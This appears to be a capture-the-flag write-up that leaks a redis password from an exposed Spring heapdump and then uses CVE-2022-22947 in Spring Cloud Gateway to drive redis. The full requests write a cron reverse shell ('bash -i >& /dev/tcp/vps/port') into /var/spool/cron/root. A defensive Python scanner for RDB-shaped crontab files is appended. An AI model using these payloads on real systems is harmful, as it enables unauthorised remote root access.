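Topics covered:
1. Spring sensitive file disclosure
2. Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947)
3. redis reverse shell
Solution:
First, the heapdump is exposed; reading the redis key from it gives
Then use the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947) to attack redis.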

POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "/new_route(?<path>.*)",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "http://127.0.0.1:6379/",
  "order": 0
}

POST /actuator/gateway/refresh HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json

{
  "predicate": "Paths: [/new_route], match trailing slash: true",
  "route_id": "new_route",
  "filters": [
    "[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]"
  ],
  "uri": "https://www.cnpanda.net",
  "order": 0
}

POST /new_route/xxx.xxx HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

auth P@ssw0rd
set xx "\n* * * * * bash -i >& /dev/tcp/vps/port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

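Note that the cron-job reverse shell method only works on CentOS.
It does not work on Ubuntu for the following reasons:
By default a file written by redis has 644 permissions, but Ubuntu requires the cron file /var/spool/cron/crontabs/<username> to have 600 permissions before it will run it; otherwise it reports the error (root) INSECURE MODE (mode 0600 expected). On CentOS the cron file /var/spool/cron/<username> still runs with 644 permissions.
The RDB file that redis saves contains garbage bytes, which causes an error on Ubuntu but not on CentOS.
The crontab file location also differs between systems:
On CentOS the cron file is /var/spool/cron/<username>
On Ubuntu the cron file is /var/spool/cron/crontabs/<username>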
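
The 644 mode and the RDB garbage described above are also what give such a file away on disk. The following check is an added example, not part of the original write-up: it scans the cron spool directories for files that are not mode 0600, start with the RDB magic, or contain binary bytes. make_sample_spool and its file contents are constructed test data, and a real scan needs root to read the spool.

```python
import os
import stat
import tempfile

RDB_MAGIC = b"REDIS"  # an RDB snapshot starts with this magic plus a 4-digit version
SPOOL_DIRS = ("/var/spool/cron", "/var/spool/cron/crontabs")  # CentOS, Ubuntu


def inspect_cron_file(path):
    """Return a list of findings for one crontab spool file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode != 0o600:
        findings.append(f"mode {mode:04o} (Ubuntu cron expects 0600)")
    with open(path, "rb") as fh:
        data = fh.read(1 << 20)  # far more than a real crontab needs
    if data.startswith(RDB_MAGIC):
        findings.append("starts with RDB magic 'REDIS'")
    # Crontabs are plain text; NUL or other control bytes mean a binary dump.
    if any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in data):
        findings.append("contains binary control bytes")
    return findings


def scan_spool(dirs=SPOOL_DIRS):
    """Map each suspicious spool file to its findings."""
    report = {}
    for d in dirs:
        names = sorted(os.listdir(d)) if os.path.isdir(d) else []
        for path in (os.path.join(d, n) for n in names):
            if os.path.isfile(path) and (found := inspect_cron_file(path)):
                report[path] = found
    return report


def make_sample_spool():
    """Constructed test data: one normal crontab, one RDB-shaped file."""
    d = tempfile.mkdtemp()
    good, bad = os.path.join(d, "alice"), os.path.join(d, "root")
    with open(good, "w") as fh:
        fh.write("0 3 * * * /usr/local/bin/backup.sh\n")
    os.chmod(good, 0o600)
    with open(bad, "wb") as fh:  # constructed bytes shaped like an RDB header and key
        fh.write(b"REDIS0009\xfa\x09redis-ver\x00\x02xx\n* * * * * /bin/true\n\xff")
    os.chmod(bad, 0o644)
    return d, good, bad


if __name__ == "__main__":
    print(scan_spool())
```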